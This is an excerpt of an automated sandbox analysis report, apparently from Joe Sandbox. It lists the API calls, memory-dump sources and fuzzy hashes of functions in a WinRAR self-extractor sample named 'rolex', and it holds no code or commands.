                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 69a943e656ee331f1661201cfe822fb8f69a168c4299475660200162fa714270
                                                                                • Instruction ID: 938770db6c0d88f4d2eefd0505cbaae4aeff63328881922134f753ce45626c05
                                                                                • Opcode Fuzzy Hash: 69a943e656ee331f1661201cfe822fb8f69a168c4299475660200162fa714270
                                                                                • Instruction Fuzzy Hash: 6551C362A4964250FE20BB29D4447B9A751FB86BC4F850136EF4D077B6DE3DE489C320
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A3EC8: FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB49E993
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1011579015-0
                                                                                • Opcode ID: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                • Instruction ID: 47430ec3da844fe25e11ffbf84de4f24944697165017c2620b7e002ea08cd04d
                                                                                • Opcode Fuzzy Hash: e982e273b1865209a75a3cfd535ad9023e3388265a11ab7418cbf5dec2d39955
                                                                                • Instruction Fuzzy Hash: 6F514F22A0A68681FE60EF7DD48576DA361FF85B84F850136EA8D077B5DF2CE446C720
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 61fec30c4ba775886d5a885ca6c3d9e3f01b60c7a9016415a9e671651ca41277
                                                                                • Instruction ID: 29110cb5556f536dd773def5129e9b6e2e9d29bd19749300bff3843254951f84
                                                                                • Opcode Fuzzy Hash: 61fec30c4ba775886d5a885ca6c3d9e3f01b60c7a9016415a9e671651ca41277
                                                                                • Instruction Fuzzy Hash: 35410862B19B8142EE14AA1BA640379E251FB45FC0F858539EE5C07F7ADF7CD4518300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_7ff7ab490000_rolex.jbxd
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: 71211bdb8fcfb718bc8c1f80de60d6f389c440e1fadeaa63cd7f355b18b082f6
                                                                                • Instruction ID: 002c6342c31a6c628440f945221087c86560333edde54bbb012947474e430aa5
                                                                                • Opcode Fuzzy Hash: 71211bdb8fcfb718bc8c1f80de60d6f389c440e1fadeaa63cd7f355b18b082f6
                                                                                • Instruction Fuzzy Hash: 14410662A0EB0181EE10AB2DE545379B3A0FB85BD8F860138EA4D077B9DF3DE4408320
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                • Associated: 00000003.00000002.2047974659.00007FF7AB490000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048021052.00007FF7AB4D8000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4EB000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048042527.00007FF7AB4F4000.00000004.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FA000.00000002.00000001.01000000.00000009.sdmp
                                                                                • Associated: 00000003.00000002.2048076885.00007FF7AB4FE000.00000002.00000001.01000000.00000009.sdmp
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                • String ID:
                                                                                • API String ID: 3947729631-0
                                                                                • Opcode ID: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction ID: 231f174817c0112b4fc3ecc15d316dd2bfbd7d70951f3dd01396011205c4e2d6
                                                                                • Opcode Fuzzy Hash: 5b4d6432c9ab27f48bf344f41163fa66ca8822e5b5ed34cf2c0174bd429b5c6d
                                                                                • Instruction Fuzzy Hash: 85410522E1B60A92FB54FB2E9850178A761AF56F40FC64436DA0D476B1CF3EF841C760
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Concurrency::cancel_current_taskstd::bad_alloc::bad_alloc
                                                                                • String ID:
                                                                                • API String ID: 680105476-0
                                                                                • Opcode ID: fb4569e23469dfa57eec0626174c03e5963d7f6e26c3e18aa513be619ff1198f
                                                                                • Instruction ID: 6838046bfd2d55a163c5756ad2f4338b6870b0f1051bf7a1729aea75d23603f6
                                                                                • Opcode Fuzzy Hash: fb4569e23469dfa57eec0626174c03e5963d7f6e26c3e18aa513be619ff1198f
                                                                                • Instruction Fuzzy Hash: D721A322A0A25195FA24AEB9A400679A260BB05BF0F990730EE7E07BF1DE7CE0519310
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo
                                                                                • String ID:
                                                                                • API String ID: 3215553584-0
                                                                                • Opcode ID: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction ID: 5256a6de1b5eae740a3b8bb4126b141bec2270f3c3082de5c9c1be503d78e4d3
                                                                                • Opcode Fuzzy Hash: 9dd5a9e84c18447e56e2265fa04046f11d37b96b7f5b774ce3305aa6458b3f00
                                                                                • Instruction Fuzzy Hash: 27118132A0F6428AF750AF589480579F3A5FB40784FD70535EA4D976B6DF2DE4009721
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: GetDlgItem.USER32 ref: 00007FF7AB4BF0E3
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: ShowWindow.USER32 ref: 00007FF7AB4BF109
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF11E
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF136
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF157
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF173
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1B6
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1D4
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF1E8
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF212
                                                                                  • Part of subcall function 00007FF7AB4BF0A4: IsDlgButtonChecked.USER32 ref: 00007FF7AB4BF22A
                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7AB4BFD03
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ButtonChecked$ItemShowWindow_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 4003826521-0
                                                                                • Opcode ID: 0ecee51bcaebc13f66a433cccdbba23f80d9542112960a9b3272f635afdf41c4
                                                                                • Instruction ID: ef0a30c58d7299a0e914950608e0c091a9997c94ec7243ab49d1142dc1ab8a61
                                                                                • Opcode Fuzzy Hash: 0ecee51bcaebc13f66a433cccdbba23f80d9542112960a9b3272f635afdf41c4
                                                                                • Instruction Fuzzy Hash: B301C862A1668542FD10B77CD44537DA321FF8AB94F910331EBAD466F6DF2CE0808714
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 3668304517-0
                                                                                • Opcode ID: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                • Instruction ID: fc701ef7867717c9af939c6036f8870d78b2777de61e272a2c744096c4687d3c
                                                                                • Opcode Fuzzy Hash: dd833eb704b03c62a36fea145c0b0b4abee32047d89ef2e694e61e0216d7ee09
                                                                                • Instruction Fuzzy Hash: 73018462E1A78581EA11A72CE445269B361FFCAB94FC15231EA9C07BB6DF6CD0408714
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4C1604: GetModuleHandleW.KERNEL32(?,?,?,00007FF7AB4C1573,?,?,?,00007FF7AB4C192A), ref: 00007FF7AB4C162B
                                                                                • DloadProtectSection.DELAYIMP ref: 00007FF7AB4C15C9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: DloadHandleModuleProtectSection
                                                                                • String ID:
                                                                                • API String ID: 2883838935-0
                                                                                • Opcode ID: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                • Instruction ID: 3771bafcf22b8e5f9747101f3d859b68068029aec5e2635100580a074673fe36
                                                                                • Opcode Fuzzy Hash: 902d746097657f35995c40355b3f554eba39218e3fb79a70aefbb70b68ceb6fd
                                                                                • Instruction Fuzzy Hash: F111CC61E0B51782FB60BB2DA850371A790AF15B48FD61035C90D4B2B1FE3CBC999630
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction ID: 43592e67c9c1abda54fc772ce6628fb9d4fd6d8541416a6cdb6f365603944b29
                                                                                • Opcode Fuzzy Hash: c4d23aaef5024e3722ccbb242168b3e22d65bf63548bcaacbbf61b8d0a3ba7a1
                                                                                • Instruction Fuzzy Hash: 05F06D51B0B70785FE587BAE99113B4D2905F46F88FCA5430C90E8A7F2EE2DE6894330
                                                                                APIs
                                                                                  • Part of subcall function 00007FF7AB4A40BC: FindFirstFileW.KERNELBASE ref: 00007FF7AB4A410B
                                                                                  • Part of subcall function 00007FF7AB4A40BC: FindFirstFileW.KERNEL32 ref: 00007FF7AB4A415E
                                                                                  • Part of subcall function 00007FF7AB4A40BC: GetLastError.KERNEL32 ref: 00007FF7AB4A41AF
                                                                                • FindClose.KERNELBASE(?,?,00000000,00007FF7AB4B0811), ref: 00007FF7AB4A3EFD
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: Find$FileFirst$CloseErrorLast
                                                                                • String ID:
                                                                                • API String ID: 1464966427-0
                                                                                • Opcode ID: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction ID: 08d18e54e6f6057a2aeb6cb4e059b26a6585a7b11934a6ecf579e0f829120819
                                                                                • Opcode Fuzzy Hash: 18fe74ab7ca813274cb64c08179860cc48efc587ad39327f0b25563dc18ddab5
                                                                                • Instruction Fuzzy Hash: 78F0C86290E24185DA50BFB9A100179B760AF15BB4F96533CEA3D073F7DE28D444C765
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction ID: 26f0c30056bd93c9567537175e682ca54bc816c68ad9feb0209369c7c12a8f1d
                                                                                • Opcode Fuzzy Hash: 5fa632deebd8181b9f3ea37834cf4eccbda839d7d0d6f948310c23224b4a93e7
                                                                                • Instruction Fuzzy Hash: BBF05E15B0B60744FF547AB9580027496A05F46F60FCA1630D96E462F5DE1CE4708130
                                                                                APIs
                                                                                • FindCloseChangeNotification.KERNELBASE(?,?,00000001,00007FF7AB4A207E), ref: 00007FF7AB4A20F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: ChangeCloseFindNotification
                                                                                • String ID:
                                                                                • API String ID: 2591292051-0
                                                                                • Opcode ID: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction ID: ee3e3519801842d2b065e300408af57084c33a2b4f9837143d004fa9ce24d82f
                                                                                • Opcode Fuzzy Hash: ccbd9008d2c4ce7168f8d058ff2f34620ae6bf54bfe45a0cbca9d6a6f1a7c065
                                                                                • Instruction Fuzzy Hash: EEF0AF32A0A68285FB249B38E441379AB61EB14B78FCA4338E73C051F4DF28D8959320
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.2047990803.00007FF7AB491000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF7AB490000, based on PE: true
                                                                                Similarity
                                                                                • API ID: File
                                                                                • String ID:
                                                                                • API String ID: 749574446-0
                                                                                • Opcode ID: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                • Instruction ID: 057a9eaf41c1aa1967225c4e62ce04adccd04123fd215cde2b2eab783c495bc0
                                                                                • Opcode Fuzzy Hash: 7793d0dfaf1bed477703e517dfb550f1e48d00439aedf8bd4eeb9f79e866bcb3
                                                                                • Instruction Fuzzy Hash: 2EE0C256B2251582EF60BB3FC852638A360EF8CF84BCA5030CE4C07731CE28D4818A10
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: FileType
                                                                                • String ID:
                                                                                • API String ID: 3081899298-0
                                                                                • Opcode ID: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction ID: 38ba0cfd4eab6ac18cd7e6731d735f23b3f6cf24af9ec2548bfc570650d7e417
                                                                                • Opcode Fuzzy Hash: df9a28314c6b6fddfb177ebf539387614dcb0363737e1ba4f38fe55c4f903e1a
                                                                                • Instruction Fuzzy Hash: 19D01212D0B45192DD50A73E9C5103C6354AF92735FE50730D63E816F1CE1D9496B321
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: FreeLibrary
                                                                                • String ID:
                                                                                • API String ID: 3664257935-0
                                                                                • Opcode ID: d905035bd3ffed0fa3d42b0ba6c84558746c8bc0c2d9d26789c142ff972459f6
                                                                                • Instruction ID: a2b4f460c402dde674d49dac5215abd18bcef6de18a9f73069d5e46e98e36ffc
                                                                                • Opcode Fuzzy Hash: d905035bd3ffed0fa3d42b0ba6c84558746c8bc0c2d9d26789c142ff972459f6
                                                                                • Instruction Fuzzy Hash: 0BD09E9AD1B90685F785BB19E8953349360BF59B69FC30634C50D061728F7D3098C720
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: CurrentDirectory
                                                                                • String ID:
                                                                                • API String ID: 1611563598-0
                                                                                • Opcode ID: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction ID: 3f142954e22c00b8465e0e5c7451f58f9a2de636ebbd6c4bbefd4879f67fa5aa
                                                                                • Opcode Fuzzy Hash: 176ab68ebee512dad0278907058cd855c5c44f8615b79807412a7d406b36e525
                                                                                • Instruction Fuzzy Hash: 04C08C20F07502C1DA086B2AC8C902813A4BB40B08BE28039D10C81131CE2CC5EA9359
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                • String ID:
                                                                                • API String ID: 1693479884-0
                                                                                • Opcode ID: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                • Instruction ID: 464f7fa508ea176e171905ba5c4f11d8d3f706c9cf93d82546e7bc93ed2fa9ca
                                                                                • Opcode Fuzzy Hash: 35b10314ce3b8e4c64707b679fc70269f3b9094245ec8e91ba41ccecbc270bb7
                                                                                • Instruction Fuzzy Hash: A9A1C2B2F16B5285FE00AB7D99441BDB321AF45BA4B954239DE2D17BF9DE3CE0418310
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskDialog
                                                                                • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                • API String ID: 431506467-1315819833
                                                                                • Opcode ID: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                • Instruction ID: 39926c30a7586e70207bccbef04536081890a7a99b51f3ab28dbfedc03cf35f2
                                                                                • Opcode Fuzzy Hash: 100daac0e34165666268f43f408bc6971489d972bf40231fa28c726ba550acfe
                                                                                • Instruction Fuzzy Hash: CFB19E62F1A78285FB00ABBCD4442BCA372AB45794F814235DB5C26AFADF7CE545C360
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$ButtonCheckedObject$ClassDeleteLongName
                                                                                • String ID: STATIC
                                                                                • API String ID: 781704138-1882779555
                                                                                • Opcode ID: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction ID: 284c764f0d466261b0feddecc175eca5698cb960e0961d26a266cd8bd70e2bfd
                                                                                • Opcode Fuzzy Hash: 028936735c5caa7e1c5955390d3996a5d13f8d6e72d7f98742e6e6c768b0ab82
                                                                                • Instruction Fuzzy Hash: F431E822B0A65246FA64FB6DA5547B9A391FF98BC0F820030DE4D07B76DF3CE4028760
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: abort$CallEncodePointerTranslator
                                                                                • String ID: MOC$RCC
                                                                                • API String ID: 2889003569-2084237596
                                                                                • Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction ID: 8998b5ee85b79c6fe224e7dddc9c1b5144022e4ba59beb653ba88cd573e8993d
                                                                                • Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
                                                                                • Instruction Fuzzy Hash: DD91B073A0AB918AE710EF69E4412ADBBA0F705B88F514139EE8C17775DF38D195CB10
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: Window$Show$Rect
                                                                                • String ID: RarHtmlClassName
                                                                                • API String ID: 2396740005-1658105358
                                                                                • Opcode ID: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction ID: b9730491bdf1396dfe108dca90f5dffe8698893baafa3870ca93f6a92f87b780
                                                                                • Opcode Fuzzy Hash: 7e152e90957d1346e93cce3b53dfbd480fa38e990bdf0b518984ba75781cfd03
                                                                                • Instruction Fuzzy Hash: 5651752260A7418AEA24AB69E44437AE361FF89B80F864435DF8E47B75DF3CE0458B10
                                                                                APIs
                                                                                Strings
                                                                                Similarity
                                                                                • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                • String ID: sfxcmd$sfxpar
                                                                                • API String ID: 3540648995-3493335439
                                                                                • Opcode ID: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                • Instruction ID: 948467ed855687e2852745a56d7fc92b4d9a24e5634073913548aa778d5d444b
                                                                                • Opcode Fuzzy Hash: 65c4bc3e57016a74e8805048ea790c6f4a694eba210e4a6448e418b17608a108
                                                                                • Instruction Fuzzy Hash: 3831AF32A16A4584EB00ABADE4841BCB371FB48B88F910131DF5E577B9DF38D052C364
                                                                                APIs
                                                                                Similarity
                                                                                • API ID: AddressProc
                                                                                • String ID:
                                                                                • API String ID: 190572456-0
                                                                                • Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction ID: 2fbe1b8b7a688f7f670f32151e9d028e399654a50d563df9607f282af0a72573
                                                                                • Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
                                                                                • Instruction Fuzzy Hash: 3A412621B0BA1291FA16AF5EA8006B5E395BF15FD8F8B4535DE1D4B774EE3CE4088360
                                                                                Similarity
                                                                                • API ID: __except_validate_context_recordabort
                                                                                • String ID: csm$csm
                                                                                • API String ID: 746414643-3733052814
                                                                                • Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction ID: 301dab6349409c236298638ad1ea73483afa2a51f1a7ccb0e51f4703077c58f7
                                                                                • Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
                                                                                • Instruction Fuzzy Hash: 2A71D07250A6918AE760AF29905077DFBA0EB06F88F86C136DA4C47AB5CB3CD491C754
                                                                                Similarity
                                                                                • API ID: ByteCharErrorFileLastMultiWideWrite
                                                                                • String ID: U
                                                                                • API String ID: 2456169464-4171548499
                                                                                • Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction ID: 6ceb2bdcd2b957fdba7ec1925ebdc665cbe02e59c379642f9973d03acc6d294a
                                                                                • Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
                                                                                • Instruction Fuzzy Hash: 4F41C33271AA9182DB50DF69E4443B9A760FB88794FC24031EE4D877A4DF7CD441C750
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                • String ID:
                                                                                • API String ID: 4141327611-0
                                                                                • Opcode ID: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction ID: 6381581287e2911203499482feb2f7c89e5bddc1d2cdc3985a4eef5b0e9909cb
                                                                                • Opcode Fuzzy Hash: fdb879c7c344a6dcddabd48f24568e2f5e84c2dc3f6ceef9c32cec135b3ccbbf
                                                                                • Instruction Fuzzy Hash: 2241B832A0EA4246F761AF189040379E2A0EF82F90F964131DB5D47AFBDF7CE4618720
                                                                                APIs
                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0B91
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0BF3
                                                                                • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0C2D
                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF7AB4CC45B), ref: 00007FF7AB4D0C57
                                                                                Similarity
                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                • String ID:
                                                                                • API String ID: 1557788787-0
                                                                                • Opcode ID: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction ID: fd09dad6d742dc65260bc9d1a7220837d3f1d0eebd16e193ec8f52d50f5454e7
                                                                                • Opcode Fuzzy Hash: 23704c5f87cc5d65a6a85ab0da0438508b9fc27f2b888927c3d6011bf25654c1
                                                                                • Instruction Fuzzy Hash: 51218231A1BB5181E6A4AF1A6450029EBA5FB54FD0BC94235DE8E23BB8DF3CE4528314
                                                                                Similarity
                                                                                • API ID: ErrorLast$abort
                                                                                • String ID:
                                                                                • API String ID: 1447195878-0
                                                                                • Opcode ID: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction ID: 50a8d5db5340a8a9c4ff4111e663ad4c8c7700b61e87881048a085f7362be146
                                                                                • Opcode Fuzzy Hash: df247b5a3948333368795c339682862bf84e23f7c025c70b8dad3e7beb060077
                                                                                • Instruction Fuzzy Hash: EB01DE20B0BB0242FA597B2DAA45138D2A15F46F90F824838DA1E427F6ED2CB8254230
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                • String ID: DXGIDebug.dll
                                                                                • API String ID: 3668304517-540382549
                                                                                • Opcode ID: 9b611769b57abaa4d1aa37b6f78c1b95125875c5bdd6e0a23bce2da3a8b598ec
                                                                                • Instruction ID: 454f89906e72b31aed470d84475fe7de32ed1ceb048b3f1cc3df03fd9c73e6bd
                                                                                • Opcode Fuzzy Hash: 9b611769b57abaa4d1aa37b6f78c1b95125875c5bdd6e0a23bce2da3a8b598ec
                                                                                • Instruction Fuzzy Hash: 7B71AE72A15B8186EB14DF69E4403ADB3A8FB54B94F854236DBAC07BB9DF78E051C310
                                                                                Similarity
                                                                                • API ID: _invalid_parameter_noinfo_noreturn$swprintf
                                                                                • String ID: SIZE
                                                                                • API String ID: 449872665-3243624926
                                                                                • Opcode ID: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                • Instruction ID: a35e35843962edbd4a79e7bd21484bce58f9c241c43890b47c3a7a758a1d67a8
                                                                                • Opcode Fuzzy Hash: 1ee6a6b9fbbd6c3126f8bc5ffec1b6aa008f2877db1f13591811bbd6ed408201
                                                                                • Instruction Fuzzy Hash: C541D763A1A74285EE10EB2CE4453BDA360EF86790FD24235EB9D066F6EE3CD540C710
                                                                                Similarity
                                                                                • API ID: Item$Text$Dialog
                                                                                • String ID: ASKNEXTVOL
                                                                                • API String ID: 2638039312-3402441367
                                                                                • Opcode ID: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
                                                                                • Instruction ID: cbfc645b752ffe61319af7b9aff4516a33861ec1cfd5521e7bee6d8afa7e5f65
                                                                                • Opcode Fuzzy Hash: 75a4ef6a6cdb84fc8c98b7401f85638b76a9530d4b428818baa7d4c6ec3066de
